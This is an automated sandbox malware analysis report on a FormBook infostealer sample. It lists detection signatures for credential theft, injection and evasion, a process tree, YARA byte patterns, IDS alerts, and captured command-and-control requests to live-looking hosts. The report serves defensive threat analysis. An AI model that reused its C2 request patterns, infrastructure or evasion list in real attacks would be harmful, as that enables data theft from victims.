Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO76389.exe

Overview

General Information

Sample name:PO76389.exe
Analysis ID:1511731
MD5:f28830224d4ed5b9b9b16fb45d5fd569
SHA1:1cefa43bae388468b9a931ec31f49248711de624
SHA256:5cf70c937525b712b048b9196182e3a1a988d2f112d8b7647773bcd0db23101d
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO76389.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\PO76389.exe" MD5: F28830224D4ED5B9B9B16FB45D5FD569)
    • svchost.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\PO76389.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TrBUxuahdhJ.exe (PID: 2556 cmdline: "C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6000 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • TrBUxuahdhJ.exe (PID: 2796 cmdline: "C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x3edbf:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x26fbe:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.2520000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.2520000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.2520000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.2520000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO76389.exe", CommandLine: "C:\Users\user\Desktop\PO76389.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO76389.exe", ParentImage: C:\Users\user\Desktop\PO76389.exe, ParentProcessId: 4028, ParentProcessName: PO76389.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO76389.exe", ProcessId: 6388, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO76389.exe", CommandLine: "C:\Users\user\Desktop\PO76389.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO76389.exe", ParentImage: C:\Users\user\Desktop\PO76389.exe, ParentProcessId: 4028, ParentProcessName: PO76389.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO76389.exe", ProcessId: 6388, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-16T09:38:08.414020+020028554651A Network Trojan was detected192.168.2.5497123.33.130.19080TCP
            2024-09-16T09:38:32.474744+020028554651A Network Trojan was detected192.168.2.54971613.228.81.3980TCP
            2024-09-16T09:39:06.757238+020028554651A Network Trojan was detected192.168.2.54972066.81.203.20080TCP
            2024-09-16T09:39:20.746616+020028554651A Network Trojan was detected192.168.2.549724103.42.108.4680TCP
            2024-09-16T09:39:36.928247+020028554651A Network Trojan was detected192.168.2.5497283.33.130.19080TCP
            2024-09-16T09:39:58.290494+020028554651A Network Trojan was detected192.168.2.549732199.59.243.22680TCP
            2024-09-16T09:40:11.717811+020028554651A Network Trojan was detected192.168.2.549736162.0.239.14180TCP
            2024-09-16T09:40:33.098500+020028554651A Network Trojan was detected192.168.2.54974084.32.84.3280TCP
            2024-09-16T09:40:55.803698+020028554651A Network Trojan was detected192.168.2.549744154.23.176.19780TCP
            2024-09-16T09:41:09.876720+020028554651A Network Trojan was detected192.168.2.54974862.149.128.4080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-16T09:38:24.846707+020028554641A Network Trojan was detected192.168.2.54971313.228.81.3980TCP
            2024-09-16T09:38:27.367662+020028554641A Network Trojan was detected192.168.2.54971413.228.81.3980TCP
            2024-09-16T09:38:29.944838+020028554641A Network Trojan was detected192.168.2.54971513.228.81.3980TCP
            2024-09-16T09:38:39.260384+020028554641A Network Trojan was detected192.168.2.54971766.81.203.20080TCP
            2024-09-16T09:38:41.807298+020028554641A Network Trojan was detected192.168.2.54971866.81.203.20080TCP
            2024-09-16T09:38:44.354147+020028554641A Network Trojan was detected192.168.2.54971966.81.203.20080TCP
            2024-09-16T09:39:13.080520+020028554641A Network Trojan was detected192.168.2.549721103.42.108.4680TCP
            2024-09-16T09:39:15.619923+020028554641A Network Trojan was detected192.168.2.549722103.42.108.4680TCP
            2024-09-16T09:39:18.184785+020028554641A Network Trojan was detected192.168.2.549723103.42.108.4680TCP
            2024-09-16T09:39:26.244471+020028554641A Network Trojan was detected192.168.2.5497253.33.130.19080TCP
            2024-09-16T09:39:29.854942+020028554641A Network Trojan was detected192.168.2.5497263.33.130.19080TCP
            2024-09-16T09:39:31.392341+020028554641A Network Trojan was detected192.168.2.5497273.33.130.19080TCP
            2024-09-16T09:39:50.728486+020028554641A Network Trojan was detected192.168.2.549729199.59.243.22680TCP
            2024-09-16T09:39:53.196514+020028554641A Network Trojan was detected192.168.2.549730199.59.243.22680TCP
            2024-09-16T09:39:55.749004+020028554641A Network Trojan was detected192.168.2.549731199.59.243.22680TCP
            2024-09-16T09:40:04.087002+020028554641A Network Trojan was detected192.168.2.549733162.0.239.14180TCP
            2024-09-16T09:40:07.557349+020028554641A Network Trojan was detected192.168.2.549734162.0.239.14180TCP
            2024-09-16T09:40:10.104368+020028554641A Network Trojan was detected192.168.2.549735162.0.239.14180TCP
            2024-09-16T09:40:25.435088+020028554641A Network Trojan was detected192.168.2.54973784.32.84.3280TCP
            2024-09-16T09:40:27.962763+020028554641A Network Trojan was detected192.168.2.54973884.32.84.3280TCP
            2024-09-16T09:40:30.536274+020028554641A Network Trojan was detected192.168.2.54973984.32.84.3280TCP
            2024-09-16T09:40:48.170963+020028554641A Network Trojan was detected192.168.2.549741154.23.176.19780TCP
            2024-09-16T09:40:50.724097+020028554641A Network Trojan was detected192.168.2.549742154.23.176.19780TCP
            2024-09-16T09:40:53.451273+020028554641A Network Trojan was detected192.168.2.549743154.23.176.19780TCP
            2024-09-16T09:41:02.161582+020028554641A Network Trojan was detected192.168.2.54974562.149.128.4080TCP
            2024-09-16T09:41:04.709926+020028554641A Network Trojan was detected192.168.2.54974662.149.128.4080TCP
            2024-09-16T09:41:07.236054+020028554641A Network Trojan was detected192.168.2.54974762.149.128.4080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PO76389.exeReversingLabs: Detection: 76%
            Source: PO76389.exeVirustotal: Detection: 73%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: PO76389.exeJoe Sandbox ML: detected
            Source: PO76389.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrBUxuahdhJ.exe, 00000004.00000002.4568774085.000000000092E000.00000002.00000001.01000000.00000005.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4568123137.000000000092E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004CDD92
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00502044
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050219F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005024A9
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004F6B3F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004F6E4A
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004FF350
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FFD47 FindFirstFileW,FindClose,0_2_004FFD47
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004FFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0061C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0061C0D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax5_2_00609B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h5_2_02CA04DF

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 154.23.176.197:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49712 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49720 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49716 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 154.23.176.197:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49728 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49724 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 154.23.176.197:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 154.23.176.197:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49732 -> 199.59.243.226:80
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: DNS query: www.quantumnests.xyz
            Source: DNS query: www.siyue.xyz
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewIP Address: 162.0.239.141 162.0.239.141
            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0050550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_0050550C
            Source: global trafficHTTP traffic detected: GET /gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6 HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6 HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6 HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A== HTTP/1.1Host: www.independent200.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
